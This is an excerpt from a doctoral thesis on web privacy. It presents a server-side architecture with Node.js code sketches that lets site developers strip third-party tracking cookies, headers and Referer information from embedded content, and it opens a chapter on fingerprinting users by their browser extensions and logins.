Browser fingerprinting with extensions and web logins
Chapter 7 reports on the first large-scale behavioral uniqueness study, based on 16,393 users. To do so, we set up a website with the aim of collecting fingerprints from users, namely the browser extensions they have installed and the websites they are logged into. We test and detect the presence of 16,743 Chrome extensions, covering 28% of all free Chrome extensions. We also detect whether the user is connected to 60 different websites. We used Web Accessible Resources [249] to detect extensions, and analyzed all free Chrome Web Store extensions. We observed that 27-28% of all free Chrome extensions were detectable on any website with 100% accuracy, and that the presence of an extension can be detected in around 1 ms. We analyzed the stability of the proposed detection method: in our study, we analyzed 12,164 extensions and conclude that 72.4% of them are detectable every month during the 9-month period.
We analyze how unique users are based on their behavior, and find that 54.86% of users who have installed at least one detectable extension are unique; 19.53% of users are unique among those who have logged into one or more detectable websites; and 89.23% are unique among users with at least one extension and one login.
We use an advanced fingerprinting algorithm and show that it is possible to identify a user in less than 625 milliseconds by selecting the most unique combinations of extensions. Because privacy extensions contribute to the uniqueness of users, we study the trade-off between the number of trackers blocked by such extensions and how unique the users of these extensions are. We have found that privacy extensions should be considered more useful than harmful. The chapter concludes with possible countermeasures.
Chapter 6
Third party tracking protection solution for web
developers
This chapter presents a server-side tracking prevention solution for web developers. It is a proposal of a web architecture that can be easily adopted by web developers, by simply plugging it into existing web servers, in order to protect all their users against third party tracking. The main intuition is to redirect all third party content through a trusted Middle Party Server, which removes tracking information from third party requests and responses.
The content of this chapter is replicated from the paper entitled "Control What You Include! Server-Side Protection against Third Party Web Tracking", which was published at the 9th International Symposium on Engineering Secure Software and Systems (ESSoS) in 2017.
1 Introduction
Third party tracking is the practice by which third parties recognize users across different websites as they browse the web. In recent years, tracking technologies have been extensively studied and measured [185,188,217,225,230,242] – researchers have found that third parties embedded in websites use numerous technologies, such as third party cookies, HTML5 local storage, browser cache and device fingerprinting, that allow the third party to recognize users across websites [250] and build browsing history profiles. Researchers found that more than 90% of Alexa top 500 websites [242] contain third party web tracking content, while some sites include as many as 34 distinct third party contents [222].
But why do website developers include so much third party content (that may track their users)? Though some third party content, such as images and CSS [22] files, can be copied to the main (first-party) site, such an approach has a number of disadvantages for other kinds of content. Advertisement is the basis of the economic model of the web – without advertisements many website providers would not be able to financially support their website maintenance. Third party JavaScript libraries offer extra functionality: though copies of such libraries can be stored on the main first party site, this solution sacrifices the maintenance of these libraries when new versions are released; the developer would need to manually check for new versions. Web mashups, such as applications that combine hotel search with maps, are by design based on reusing third party content and would not be able to provide their basic functionality without including it. Including JavaScript libraries, content for mashups, or advertisements means that web developers cannot give their users any guarantee of non-tracking. Apart from an ethical decision not to track users, since May 2018, website owners now
have a legal obligation as well not to track users. The ePrivacy directive (also known as the 'cookie law') has been updated to a regulation, and makes website owners liable for third party tracking that takes place on their websites. This regulation applies to all services delivered to individuals located in the European Union and imposes high penalties for any violation [161]. Hence, privacy compliance will be of high interest to all website owners and developers, and today there is no automatic tool that can help control third party tracking. To keep a promise of non-tracking, the only solution today is to exclude any third party content 1, thus trading functionality for privacy.
In this chapter, we present a new web application architecture that allows web developers to gain control over certain types of third party content. Our solution is based on the automatic rewriting of the web application in such a way that third party requests are redirected to a trusted web server with a different domain than the main site. This trusted web server may either be controlled by a trusted party or by the main site owner – it is enough that the trusted web server has a different domain. A trusted server is needed so that the user's browser treats all redirected requests as third party requests, like in the original web application. The trusted server automatically eliminates third party tracking cookies and other tracking technologies.
In summary, our contributions are:
— A classification of third party content that can and cannot be controlled by the website developer.
— An analysis of third party tracking capabilities – we analyze two mechanisms: recognition of a web user, and identification of the website she is visiting 2.
— A new architecture that allows third party content to be included in web applications while eliminating stateful cookie-based tracking.
— An implementation of our architecture, demonstrating its effectiveness at preventing stateful third party tracking on several websites.
2 Background and motivation
Third party web tracking is the ability of a third party to re-identify users as they browse the web and record their browsing history [225]. Tracking is often done with the purpose of web analytics, targeted advertisement, or other forms of personalization. The more prevalent a third party is among the websites a user interacts with, the more precise is the browsing history collected by the tracker. Tracking has often been conceived as the ability of a third party to recognize the web user. However, for successful tracking, each user request should provide two components:
User recognition is the information that allows the tracker to recognize the user;
Website identification is the information that identifies the website the user is visiting.
For example, when a user visits news.com, the browser may make additional requests to
facebook.com. As a result, Facebook learns about the user’s visit to news.com. Figure 6.1
shows a hypothetical example of such tracking where facebook.com is the third party.
Consider that a third party server, such as facebook.com, hosts different kinds of content, some of which are useful to website developers. The web developer of another website,
1. For example, see https://duckduckgo.com/.
2. Tracking is often defined as the ability of a third party to recognize a user through different websites.
However, being able to identify the websites a user is interacting with is equally crucial for the effectiveness
of tracking.
Figure 6.1 – Third Party Tracking
say mysite.com, would like to include such functional content from Facebook, for example the Facebook "Like" button, an image, or a useful JavaScript library, but the developer does not want its users to be tracked by Facebook. If the web developer simply includes third party Facebook content in his application, all its users are likely to be tracked by cookie-based tracking. Notice that each request to facebook.com also contains an HTTP Referer header, automatically attached by the browser. This header contains the URL of the website that the user is visiting, which allows Facebook to build the user's browsing history profile.
This example demonstrates cookie-based tracking, which is extremely common [242]. Other types of third party tracking, which use client-side storage mechanisms such as HTML5 LocalStorage or the cache, as well as device fingerprinting, which does not require any storage capabilities, are also becoming more and more popular [188].
Web developer perspective
A web developer may include third party content in her webpages either because this content intentionally tracks users (for example, for targeted advertising), or because this content is important for the functioning of the web application. We therefore distinguish two kinds of third party content from a web developer perspective: tracking and functional. Tracking content is intentionally embedded by the website owner for tracking purposes. Functional content is embedded in a webpage for purposes other than tracking: for example, JavaScript libraries that provide additional functionality, such as jQuery, or other components, such as maps. In this work, we focus on functional content and investigate the following questions:
— What kind of third party content can be controlled from a server-side (web developer) perspective?
— How to eliminate the two components of tracking (user recognition and website identification) from the functional third party content that websites embed?
2.1 Browsing context
When a browser renders a webpage delivered by a first party, the page is placed within a browsing context [19]. A browsing context represents an instance of the browser in which a document such as a webpage is displayed to a user, for instance browser tabs and popup windows. Each browsing context contains 1) a copy of the browser properties (such as browser name, version, device screen, etc.), stored in a specific object; 2) other objects that depend on the origin of the document according to the SOP. For instance, the object document.cookie gives the cookies related to the domain and path of the current context.
In-context and cross-context content. Certain types of content embedded in a webpage, such as images, links, and scripts, are associated with the context of the webpage, and we call them in-context content. Other types of content, such as <iframe>, <embed>, and <object> tags, are associated with their own browsing context, and we call them cross-context content. Usually, cross-context content, such as <iframe> elements, cannot be visually distinguished from the webpage in which it is embedded; however, it is as autonomous as other browsing contexts, such as tabs or windows. Table 6.1 shows different third party content and their execution contexts.
Table 6.1 – Third party content and execution context

                 HTML tags                                Third party content
in-context       <link>                                   stylesheets
                 <img>                                    images
                 <audio>                                  audios
                 <video>                                  videos
                 <form>                                   forms
                 <script>                                 scripts
cross-context    <(i)frame>, <frameset>, <a>, <area>      web pages
                 <object>, <embed>, <applet>              plugins and web pages
The Same Origin Policy manages interactions between different browsing contexts. In particular, it prevents in-context scripts from interacting with cross-context iframes when their origins are different. To communicate, they may use inter-frame communication APIs such as postMessage [116], as sketched below.
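For illustration, a page from mysite.com and an iframe from third.com could exchange messages as follows (the element id and message contents are illustrative):

// In an in-context script of the page loaded from http://mysite.com:
var frame = document.getElementById("third-party-frame");    // iframe embedding http://third.com content
frame.contentWindow.postMessage(document.location.href, "http://third.com");

// In a script running inside the cross-context iframe served by http://third.com:
window.addEventListener("message", function(event) {
    if (event.origin === "http://mysite.com") {               // accept messages from the embedding site only
        console.log("Embedding page:", event.data);
    }
});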
2.2 Third party tracking
In this work, we consider only stateful tracking technologies – those that require an identifier to be stored on the client side. The most common storage mechanism is cookies, but others, such as HTML5 LocalStorage and the browser cache, can also be used for stateful tracking. Figure 6.2 presents the well-known stateful tracking mechanisms [225]. We distinguish two components necessary for successful tracking: user recognition and website identification. For each component, we describe the capabilities of in-context and cross-context content. We also distinguish passive tracking (through HTTP headers) and active tracking (through JavaScript or plugin scripts).
                 User recognition                           Website identification
                 Passive              Active                Passive        Active
in-context       HTTP cookies         –                     Referer        document.URL
                 Cache-Control                              Origin         document.location
                 Etag                                                      window.location
                 Last-Modified
cross-context    (same passive        Flash LSOs            Referer        document.referrer
                 headers as above)    document.cookie
                                      window.localStorage
                                      window.indexedDB

Figure 6.2 – Stateful tracking mechanisms
In-context tracking. In-context third party content is associated with the browsing
context of the webpage that embeds it (see Table 6.1).
Passively, such content may use HTTP headers to recognize a user and identify the visited website. When a webpage is rendered, the browser sends a request to fetch all third party content embedded in that page. The responses from the third party, along with the requested content, may contain HTTP headers that are used for tracking. For example, the Set-Cookie HTTP header tells the browser to save third party cookies, which will later be automatically attached to every request to that third party in the Cookie header. The Etag HTTP header and other cache mechanisms, like the Last-Modified and Cache-Control HTTP headers, may also be used to store user identifiers [250] in a browser. To identify the visited website, a third party can either check the Referer HTTP header, automatically attached by the browser, or the Origin header 3.
Actively, in-context third party content cannot use browser storage mechanisms, such as cookies or HTML5 Local Storage, associated with the third party because of the limitations imposed by the SOP (see Section 2.1). For example, if a third party script from third.com uses the document.cookie API, it will read the cookies of the main website, but not those of third.com. This allows tracking within the main website but not cross-site tracking [242]. For website identification, third party active content, such as scripts, can use several APIs, for example document.location.
Cross-context tracking. Cross-context content, such as an iframe, is associated with the browsing context of the third party that provided this content.
Passively, the browser may transmit HTTP headers used for user recognition and website identification, just like in the case of in-context content. Every third party request for cross-context content will contain the URL of the embedding webpage in its Referer header.
Requests to fetch third party content further embedded inside a cross-context (such as an iframe) will carry, not the URL of the embedding webpage, but that of the iframe in their Referer or Origin headers (in the case of CORS requests). This prevents them from passively identifying the embedding webpage.
Actively, cross-context third party content can use a number of APIs to store user identifiers in the browser. These APIs include cookies (document.cookie), HTML5 LocalStorage (window.localStorage), IndexedDB, and Flash Local Stored Objects (LSOs). For website identification, the document.referrer API can be used – it returns the value of the HTTP Referer header transmitted in the request to the cross-context third party.
Combining in-context and cross-context tracking. Imagine a third party script from third.com embedded in a webpage – according to its context and to the SOP, it is in-context. If the same webpage embeds a third party iframe from third.com (cross-context), then because of the SOP, the script and the iframe cannot interact directly. However, they can still communicate through inter-frame communication APIs such as postMessage [116]. On one hand, the in-context script can easily identify the website using APIs such as document.location. On the other hand, the cross-context iframe can easily recognize the user by calling document.cookie. Therefore, if the iframe and the script are allowed to communicate, they can exchange these partial pieces of tracking information to fully track the user. For example, a social widget, such as the Facebook "Like" button or the Google "+1" button, may be included in webpages as a script. When the social widget script is executed on the client side, it loads additional scripts and new browsing contexts (iframes), allowing the third party to benefit from both in-context and cross-context capabilities to track users.
3. Origin header is also automatically generated by the browser when the third party content is trying
to access data using Cross-Origin Resource Sharing [40] mechanism.
3 Privacy-preserving web architecture
For third party tracking to be effective, two capabilities are needed: 1) the tracker should be able to identify the website in which it is embedded, and 2) it should be able to recognize the user interacting with the website. Disabling only one of these two capabilities for a given third party already prevents tracking. In order to mitigate stateful tracking (see Section 2), we make the following design choices:
1. Preventing only user recognition for in-context content. As shown in Figure 6.2, in-context content cannot perform any active user recognition. We are left with passive user recognition and (active and passive) website identification. Preventing passive user recognition for such content (images, scripts, forms) is possible by removing HTTP headers such as Cookie, Set-Cookie, and ETag that are sent along with requests/responses to fetch such content.
Note that it is particularly difficult to prevent active website identification, because trying to alter or redefine the document.location or window.location APIs causes the main page to reload. Therefore, in-context active content (scripts) can still perform active website identification. That notwithstanding, since we remove their user recognition capability, tracking is prevented for in-context content.
2. Preventing only website identification for cross-context content. We prevent passive website identification by instructing the browser not to send the HTTP Referer header along with requests to fetch cross-context content. Therefore, when the cross-context content gets loaded, the tracker is unable to identify the website in which it is embedded. Indeed, executing document.referrer returns an empty string instead of the URL of the embedding page.
Because of the limitations of the SOP, a website owner has no control over cross-context third party content, such as iframes. Therefore, active and passive user recognition can still happen in a third party cross-context. We discuss other possibilities to block some active user recognition APIs in Section 4.1. Nonetheless, since website identification is not possible, tracking is prevented for cross-context third party content.
3. Preventing communication between in-context and cross-context content. Our architecture proposes a way to block such communications, which can be done via the postMessage API. We discuss the limitations of this approach in Section 4.1.
To help web developers keep their promise of non-tracking and still include third party content in their web applications, we propose a new web application architecture. This architecture allows web developers to 1) automatically rewrite the URLs of all in-context third party content embedded in a web application, 2) redirect those requests to a trusted third party server which 3) removes/disables known stateful tracking mechanisms (see Section 2) for such content, and 4) rewrite and redirect cross-context requests to the trusted third party so as to prevent website identification and communication with in-context scripts.
Figure 6.3 provides an overview of our web application architecture. It introduces two new components, fully controlled by the website owner.
Rewrite Server (Section 3.1) acts like a reverse proxy [122] for the original web server. It rewrites the original web pages in such a way that all requests to fetch the third party content they embed are redirected through the Middle Party Server before reaching the intended third party server.
Figure 6.3 – Privacy-Preserving Web Architecture
Middle Party Server (Section 3.2) is at the core of our solution, since it intercepts all third party requests from the browser, removes tracking, then forwards them to the intended third parties. For every response from a third party, the server removes tracking information and forwards the response back to the browser. For in-context content such as images and scripts, the Middle Party Server prevents user recognition and website identification, while for cross-context content such as iframes, it prevents website identification and communication with other in-context scripts.
3.1 Rewrite Server
The goal of the Rewrite Server is to rewrite the original content of the requested webpages in such a way that all third party requests are redirected to the Middle Party Server. It consists of three main components: a static HTML rewriter for HTML pages, a static CSS rewriter, and a JavaScript injection component. In each webpage, JavaScript code is loaded to ensure that all dynamically generated third party content is redirected to the Middle Party Server as well.
HTML and CSS Rewriter rewrites the URLs of static third party content embedded in the original web pages and CSS files in order to redirect them to the Middle Party Server. For example, the URL of a third party script source http://third.com/script.js is rewritten so that it is instead fetched through the Middle Party Server: http://middle.com/?src=http://third.com/script.js. The HTML Rewriter component is implemented using the Jsdom HTML parser [69], and the CSS Rewriter using the CSS parser [44] module for Node.js.
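As an illustration only (our actual Rewrite Server may differ in its details), the HTML rewriting step could look as follows with jsdom, assuming absolute third party URLs and http://middle.com as the Middle Party Server:

const { JSDOM } = require("jsdom");

function rewriteThirdParty(html, firstPartyOrigin, middleParty) {
    const dom = new JSDOM(html);
    const document = dom.window.document;
    // In-context content (scripts, images, media) is fetched through ?src=
    document.querySelectorAll("script[src], img[src], audio[src], video[src]").forEach(el => {
        const src = el.getAttribute("src");
        if (src.startsWith("http") && !src.startsWith(firstPartyOrigin)) {
            el.setAttribute("src", middleParty + "/?src=" + src);
        }
    });
    // Cross-context content (iframes) is fetched through ?emb=
    document.querySelectorAll("iframe[src]").forEach(el => {
        const src = el.getAttribute("src");
        if (src.startsWith("http") && !src.startsWith(firstPartyOrigin)) {
            el.setAttribute("src", middleParty + "/?emb=" + src);
        }
    });
    return dom.serialize();
}

// Example: rewriteThirdParty(page, "http://mysite.com", "http://middle.com")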
JavaScript Injection. The Rewrite Server also injects a script into all original webpages after they are rewritten. This script controls the APIs used to dynamically inject content inside a webpage once the webpage is rendered in a browser. It is available at https://webstats.inria.fr/sstp/dynamic.js. Table 6.2 shows the APIs that can be used to dynamically inject third party content within a webpage; they are controlled using the injected script.
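For illustration, the injected script could control document.createElement roughly as follows; this sketch only covers the setAttribute path for scripts and images, whereas the actual injected script must also handle direct property assignments and the other APIs of Table 6.2:

(function() {
    var originalCreateElement = document.createElement.bind(document);
    document.createElement = function(tagName) {
        var element = originalCreateElement(tagName);
        var tag = String(tagName).toLowerCase();
        if (tag === "script" || tag === "img") {
            var originalSetAttribute = element.setAttribute.bind(element);
            element.setAttribute = function(name, value) {
                // Redirect third party URLs through the Middle Party Server
                if (name === "src" && value.indexOf("http") === 0 && value.indexOf(location.origin) !== 0) {
                    value = "http://middle.com/?src=" + value;
                }
                return originalSetAttribute(name, value);
            };
        }
        return element;
    };
})();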
Table 6.2 – Injecting dynamic third party content

API                        Content
document.createElement     content from Table 6.1
document.write             any content
window.open                web pages (popups)
Image                      images
XMLHttpRequest             any data
Fetch, Request             any content
EventSource                stream data
WebSocket                  websocket data

A Content Security Policy (CSP) [275] is injected in the response header of each webpage in order to prevent third parties from bypassing the rewriting and redirection to the Middle Party Server. A CSP delivered with the webpage controls the resources of that
page by specifying which resources are allowed to be loaded and executed. By limiting the
resource origins to only those of the Middle Party Server and the website own domain, we
prevent third parties from bypassing the redirection to the Middle Party Server in order
to load content directly from a third party server. Such attempts will get blocked by the
browser upon enforcement of the CSP of the page. The following listing gives the CSP
injected in all webpages, assuming that middle.com is the domain of the Middle Party
Server.
Co n t en t- S ec ur i ty -P o li cy : de f a ul t -s r c ’s e l f ’ middle.com;
obj e c t- s rc ’ s e lf ’ ;
Figure 6.4 – Preventing trackers from combining in-context and cross-context tracking
3.2 Middle Party
The main goal of the Middle Party is to proxy the requests and responses between browsers
and third parties in order to remove tracking information exchanged between them. It
functions differently for in-context and cross-context content.
In-context content includes scripts, images, etc. (see Table 6.1). Since a third party script
from http://third.com/script.js is rewritten by the Rewrite Server to
http://middle.com/?src=http://third.com/script.js, it is fetched through the Middle Party Server.
This hides the third party destination from the browser, and therefore prevents it from
attaching third party HTTP cookies to such requests. Because the browser will still
attach some tracking information to the requests, the Middle Party Server takes the
following steps when it receives such a request URL. First, it removes the tracking
information that the browser sets as HTTP request headers; among those headers are
Etag, If-Modified-Since, Cache-Control, and Referer. Next, it makes a request to the
third party in order to get the content of the script http://third.com/script.js. Then it
removes the tracking information from the response returned by the third party; the headers
that the third party may send are Set-Cookie, Etag, Last-Modified, Cache-Control. If the
content is a CSS file, the CSS Rewriter rewrites the response in order to also redirect to the
Middle Party Server any third party content that it may embed. Finally, the response is
returned to the browser.
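The following Node.js sketch summarizes this in-context handling. It is a simplified illustration of the Middle Party Server, under the assumption that requests arrive as ?src= URLs as described above; HTTPS targets, error handling and the CSS rewriting step are omitted, and the port number is arbitrary.

// Simplified sketch of the in-context handling of the Middle Party Server.
const http = require("http");

const REQ_TRACKING = ["etag", "if-modified-since", "cache-control", "referer"];
const RES_TRACKING = ["set-cookie", "etag", "last-modified", "cache-control"];

http.createServer((req, res) => {
  const target = new URL(req.url, "http://middle.com").searchParams.get("src");
  if (!target) { res.writeHead(400); return res.end(); }

  // Remove the tracking information set by the browser as HTTP request headers.
  const headers = { ...req.headers };
  REQ_TRACKING.forEach((h) => delete headers[h]);
  delete headers.host;

  // Fetch the content from the intended third party.
  http.get(target, { headers }, (thirdRes) => {
    // Remove the tracking information from the third party response.
    const clean = { ...thirdRes.headers };
    RES_TRACKING.forEach((h) => delete clean[h]);
    res.writeHead(thirdRes.statusCode, clean);
    thirdRes.pipe(res);   // a CSS response would be rewritten here before being returned
  });
}).listen(3000);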
Cross-context content includes iframes, links, popups, etc. (see Table 6.1). The Middle Party
Server prevents website identification for cross-context content, as well as communication with
in-context scripts. This is done by loading cross-context content from another cross-context
controlled by the Middle Party Server, as illustrated in Figure 6.4.
For instance, a third party iframe from http://third.com/page.html is rewritten to
http://middle.com/?emb=http://third.com/page.html. When the Middle Party Server
receives such a request URL from the browser, it takes the following actions. URL
Rewriting. Instead of fetching directly the content of http://third.com/page.html,
the Middle Party Server generates a content in which it puts the URL of the third party
content as a hyperlink <a href="http://third.com/page.html" rel="noreferrer
noopener"></a>. The most important part of this content is the rel attribute value:
noreferrer noopener instructs the browser not to send the Referer header
when the link http://third.com/page.html is navigated. The JavaScript Injection module
adds a script to the content so that the link gets automatically navigated once the
content is rendered by the browser. Once the link is followed, the browser fetches the third
party content directly from the third party server, without going through the Middle Party
Server anymore. However, it does not include the Referer header that would identify the website;
likewise, the document.referrer API returns an empty string inside the iframe
context, which prevents the iframe from identifying the website. The third party server response is
placed in a new iframe nested within a context that belongs to the Middle Party, and not
directly in the site webpage. This prevents in-context scripts and the cross-context content
from exchanging tracking information, as illustrated in Figure 6.4.
HTTPS content. We recommend deploying the Middle Party Server as an HTTPS
server. Third party content originally served over HTTPS (before rewriting)
then still gets served over HTTPS in the presence of the Middle Party Server. Moreover,
third party content originally served over HTTP would normally get blocked by current browsers
according to the Mixed Content policy [273]; with an HTTPS Middle Party, however, such HTTP third
party requests are not prevented from loading, since they are fetched over HTTPS
through the Middle Party.
Multiple redirections. A third party may attempt to circumvent our solution by performing
multiple redirections. This is commonly used in advertisements (though ads are
not within the scope of this work).
When a (third party) web server wants to redirect to another server, it usually
does so by including in the response a special Location HTTP header that indicates the server to
which the next request will be sent. The Middle Party Server prevents such circumvention
by rewriting the Location header so that the browser sends the next redirection request to
the Middle Party Server again. As a result, all the redirections pass through the Middle Party.
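A sketch of this rewriting, under the same assumptions as above (a MIDDLE prefix for the Middle Party Server), could look as follows.

// Sketch of Location header rewriting for third party redirections (simplified).
const MIDDLE = "https://middle.com/?src=";       // assumed Middle Party prefix

function rewriteResponseHeaders(thirdPartyHeaders) {
  const headers = { ...thirdPartyHeaders };
  if (headers.location) {
    // The next redirection request is sent to the Middle Party Server again.
    headers.location = MIDDLE + headers.location;
  }
  return headers;
}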
4 Implementation
We have implemented both the Rewrite Server and the Middle Party Server as full Node.js [105]
web servers supporting HTTP(S) protocols and web sockets. Implementation details are
available at http://www-sop.inria.fr/members/Doliere.Some/essos/.
Rewrite Server
In our implementation, we deploy the Rewrite Server on the same physical machine as
the original web application server. To do so, we moved the original server to a
different port number and run the Rewrite Server on the original port.
Requests sent by browsers therefore first reach the Rewrite Server, which simply
forwards them to the original server; the latter handles each request as usual and returns a
response to the Rewrite Server. HTML webpages and CSS files are then rewritten using
the HTML Rewriter and CSS Rewriter components respectively. To handle dynamic
third party content, we inject a script, and to prevent malicious third parties
from bypassing the redirection, we inject a CSP (see Section 3.1).
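The sketch below illustrates this forwarding setup with the Node.js http module. It is a simplified, hypothetical front end: rewriteHTML() stands for the HTML Rewriter of Section 3.1, original.com is a placeholder for the site's own origin, and script injection, CSS handling and HTTPS are omitted.

// Simplified sketch of the Rewrite Server front end (not our actual implementation).
const http = require("http");

const CSP = "default-src 'self' middle.com; object-src 'self';";

http.createServer((req, res) => {
  // Forward the request to the original server, moved to port 8080.
  const upstream = http.request(
    { host: "localhost", port: 8080, path: req.url, method: req.method, headers: req.headers },
    (origRes) => {
      const type = origRes.headers["content-type"] || "";
      if (!type.includes("text/html")) {          // pass non-HTML responses through untouched
        res.writeHead(origRes.statusCode, origRes.headers);
        return origRes.pipe(res);
      }
      let body = "";
      origRes.setEncoding("utf8");
      origRes.on("data", (chunk) => { body += chunk; });
      origRes.on("end", () => {
        const page = rewriteHTML(body, "http://original.com");  // HTML Rewriter of Section 3.1
        res.writeHead(origRes.statusCode, {
          "content-type": type,
          "content-security-policy": CSP,         // prevents bypassing the redirection
        });
        res.end(page);
      });
    }
  );
  req.pipe(upstream);
}).listen(80);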
Middle Party
All requests to load third party content embedded in a website deploying our architecture
go through the Middle Party Server. In-context and cross-context content are handled
differently.
In-context content is simply stripped of the tracking information that it carries from the
browser to the third parties and vice versa; see Section 3 for the list of tracking information
removed from third party requests and responses. In particular, third party CSS
responses are rewritten, using the CSS Rewriter component, to redirect to the Middle
Party Server any third party content that they may further embed. As in the case of the
Rewrite Server, this component is implemented using a CSS parser [44] for Node.js.
Cross-context content is handled in such a way that the original website identity is not
leaked to it, and it is prevented from communicating with any in-context third
party content to exchange tracking information. If the cross-context URL is
http://third.com/page.html, instead of making a request to third.com, the Middle Party
Server returns to the browser a response that rewrites the URL as a hyperlink
<a href="http://third.com/page.html" rel="noreferrer noopener"></a>
and injects the following script:
// The injected anchor points to the third party content (see above).
var third_party = document.getElementsByTagName("a")[0];
if (window.top == window.self) {
    // Top-level context (e.g. a popup): open the link in a new tab and close this one.
    third_party.target = "_blank";
    third_party.click();
    window.close();
} else {
    // Inside the Middle Party context: load the third party content in a nested iframe.
    var iframe = document.createElement("iframe");
    iframe.name = "iframetarget";
    document.body.appendChild(iframe);
    third_party.target = "iframetarget";
    third_party.click();
}
Overall, when this response is rendered, the browser will not send the Referer header
to the third party, and the third party is prevented from communicating with in-context
content, as explained in Section 3.2.
4.1 Discussion and limitations
Our approach suffers from the following limitations. First, while our implementation
prevents cross-context and in-context content from communicating with each other using
the postMessage API, an in-context third party script can still identify the website a
user visits via the document.location.href API. The script can include the website URL,
say http://main.com, as a parameter of the URL of a third party iframe, for example
http://third.com/page.html?ref=http://main.com, and dynamically embed it in the
webpage. In our architecture, this URL is rewritten and routed to the Middle Party.
Since the Middle Party Server does not inspect URL parameters, this information will
reach the third party even though the Referer is not sent with cross-context requests.
Another limitation concerns dynamic CSS changes. For instance, changing the background
image via the style object of an element in the webpage is not captured by the dynamic
rewriting script injected in webpages. Therefore, if the image is a third party image, the
CSP will prevent it from loading.
Performance overhead. There is a performance cost associated with the Rewrite Server,
comparable to the cost of introducing any reverse proxy into a web application
architecture (see Section 3.1). Rewriting content server-side and browser-side is also
expensive in terms of performance. We believe that server-side caching mechanisms, in
particular for static webpages, may help speed up the responsiveness of the Rewrite Server.
The Middle Party Server may also introduce a performance overhead, especially for webpages
with numerous third party contents. It can therefore be provided as a service by a trusted
external party, as is the case for Content Distribution Networks (CDNs) serving content
for many websites.
Extension to stateless tracking. Even though this work did not address stateless tracking
such as device fingerprinting, our architecture already hides several fingerprintable
device properties and can be extended to several others: 1) the redirection through the Middle
Party anonymizes the real IP addresses of users; 2) some stateless tracking APIs such
as window.navigator, window.screen, and HTMLCanvasElement can be easily removed or
randomized in the context of the webpage to mitigate in-context fingerprinting.
Possibility of blocking active user recognition in cross-context. With the prevalence
of third party tracking on the web, we have shown the challenges that a developer
faces when trying to mitigate it. The sandbox attribute for iframes helps prevent access
to security-sensitive APIs. As tracking has become a major concern, we suggest that similar
mechanisms could help first party websites tackle third party tracking: the sandbox
attribute could, for instance, be extended with specific values dedicated to tracking protection. In the meantime,
the sandbox attribute can already be used to prevent cross-context content from using some stateful tracking
mechanisms [76].
5 Evaluation and Case Study
Demo website. We have set up a demo website that embeds a collection of third party
content, both in-context and cross-context. In-context content includes images, HTML5
audio and video, and a Google Map, which further loads dynamic content such as images,
fonts, scripts, and CSS files. A Youtube video is embedded as cross-context content in an
iframe. The demo website is deployed at https://sstp-rewriteproxy.inria.fr. With
our solution deployed, there is no change from a user perspective in how the demo
website is accessed: it is still reachable at https://sstp-rewriteproxy.inria.fr.
From the server side, however, it is the Rewrite Server which now runs at
https://sstp-rewriteproxy.inria.fr instead of the original server. It intercepts user
requests and forwards them to the original server, which has been moved to port 8080
(http://sstp-rewriteproxy.inria.fr:8080), hidden from users and the outside.
The Middle Party Server runs at https://sstp-middleparty.inria.fr. With our archi-
tecture deployed, all requests to fetch third party content embedded in the demo website
are redirected to the Middle Party Server. For in-context content, it removes any tracking
information in the requests sent by the browser. Then it forwards the requests to the third
parties. Any tracking information set by the third parties in the responses is also removed
before being forwarded to the browser. The cross-context content (the Youtube video in
our demo) is not directly loaded as an iframe inside the demo page. Instead, an iframe
from the Middle Party Server is created and embedded inside the demo webpage. Then
the Youtube video is automatically loaded in another iframe inside this first iframe whose
context is that of the Middle Party Server. During this process, the Referer header is not
leaked to Youtube (Section 3.2), preventing it from identifying the demo website in which
it is included.
Figure 6.5 – A demo page displaying a Google Map
Figure 6.5 shows a screenshot of the redirection of third party requests to the Middle Party
Server.
Real websites. Since we did not have access to real websites, we could not install the
Rewrite Server on them to evaluate our solution. We therefore implemented a browser
proxy based on a Node.js proxy [106] and included all the logic of the Rewrite Server within
the proxy. The proxy was deployed at https://sstp-rewriteproxy.inria.fr:5555 and
acts like the Rewrite Server for real websites: it intercepts and forwards requests to them,
and rewrites the responses in order to redirect them to our Middle Party Server deployed
at https://sstp-middleparty.inria.fr.
We then evaluated our solution on different kinds of websites: a news website http://
www.bbc.com, an entertainment website http://www.imdb.com, and a shopping website
http://verbaudet.fr. All three websites load content from various third party domains.
Visually, we did not notice any change in the behaviors of the websites. We also interacted
with them in a standard way (clicking on links on a news website, choosing products and
putting them in the basket on the shopping website) and the main functionalities of the
websites were preserved.
Overall, these evaluation scenarios have helped us improve the solution, especially the rewriting
of dynamically injected third party content. We believe that the implementation will mature
further once we are able to convince some website owners to deploy it.
Limitations of the evaluation on real websites.
Deploying our solution on real websites may break some features of a website or introduce
performance issues. Here, we discuss such problems and how to prevent them.
Third party identity (OpenID) providers such as Facebook or Google need to use third
party cookies in order to authenticate users to third party websites. Therefore, stripping
off cookies can prevent users from successfully logging in to the related websites. In a
deployment scenario, we make it possible for the developer to instruct the Rewrite Server
not to rewrite such third party identity provider content so that users can still log in.
Furthermore, it is common for websites to rely on Content Distribution Networks (CDNs),
from which they load content for performance purposes. Therefore, rewriting and redirect-
ing CDNs requests to the Middle Party Server can introduce performance issues. In this
case also, a developer can declare a list of CDNs whose requests should not be rewritten
by the Rewrite Server.
Finally, as one may have noticed, the real websites we have considered in our evaluation
scenario are all HTTP websites. We could not evaluate our solution on real HTTPS
websites because HTTPS requests and responses that arrive at the browser proxy are
encrypted. Therefore, we could not rewrite the third party content embedded in such
websites.
6 Conclusion
Most of the previous research analyzed third party tracking mechanisms and how to block
tracking from a user perspective. In this chapter, we classified third party tracking capabilities
from a website developer perspective. We proposed a new architecture that allows website
developers to embed third party content while preserving users' privacy. We
implemented our solution and evaluated it on real websites to mitigate stateful tracking.
Chapter 7
Browser fingerprinting based on extensions and web
logins
Preamble
This chapter presents browser fingerprinting based on the browser extensions a user installs
and the websites she is logged into. The content of this chapter is replicated from the
paper titled "To Extend or not to Extend: on the Uniqueness of Browser Extensions and
Web Logins", published in the proceedings of the 2018 Workshop on Privacy
in the Electronic Society (WPES'18). This work was done in collaboration with other authors
from Inria.
1 Introduction
In the last decades, researchers have been actively studying users' uniqueness in various
fields; in particular, the biometrics and privacy communities analyze, hand in hand, various
characteristics of people, their behavior, and the systems they use. Related research
showed that a person can be characterized based on her typing behavior [243, 279], mouse
dynamics [239], and interaction with websites [190]. Furthermore, the Internet and mobile
devices provide a rich environment where users' habits and preferences can be automatically
detected. Prior works showed that users can be uniquely identified based on the websites
they visit [231], the smartphone apps they install [166], and the mobile traces they leave behind
them [183].
Since the web browser is the tool people use to navigate the Web, the privacy research
community has studied various forms of browser fingerprinting [165, 180, 185, 188, 191, 230].
